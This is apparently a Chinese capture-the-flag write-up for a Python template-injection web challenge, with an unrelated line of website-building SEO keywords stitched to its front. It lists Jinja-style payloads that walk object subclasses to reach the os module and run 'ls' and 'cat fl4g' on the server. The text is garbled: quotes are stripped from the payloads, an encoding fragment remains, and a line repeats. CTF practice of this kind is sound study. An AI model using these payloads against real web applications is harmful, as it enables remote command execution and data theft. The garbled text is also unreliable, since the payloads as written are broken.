中山门户网站建设,优化方案怎么写,外贸网站建设流程图,建设网站 目标背景知识 python模板注入 ssit
题目 打开题目#xff0c;发现页面提示#xff0c;翻译为python模板注入
先测试是否存在注入 可以发现被执行了
先查看所有的子类
payload
{{[].__class__.__base__.__subclasses__()}} 利用site.Printer的os模块执行命令
payload
{{.__…背景知识 python模板注入 ssit
题目 打开题目发现页面提示翻译为python模板注入
先测试是否存在注入 可以发现被执行了
先查看所有的子类
payload
{{[].__class__.__base__.__subclasses__()}} 利用site.Printer的os模块执行命令
payload
{{.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[os].popen(ls).read()}} 可以看到当前目录下有个fl4g执行cat fl4g
payload
{{.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[os].popen(cat fl4g).read()}} 得到flag 参考学习链接
https://www.cnblogs.com/qiushuo/p/17454498.html
攻防世界-web-Web_python_template_injection_wuh2333的博客-CSDN博客
Web_python_template_injectionPython模块注入_kali-Myon的博客-CSDN博客
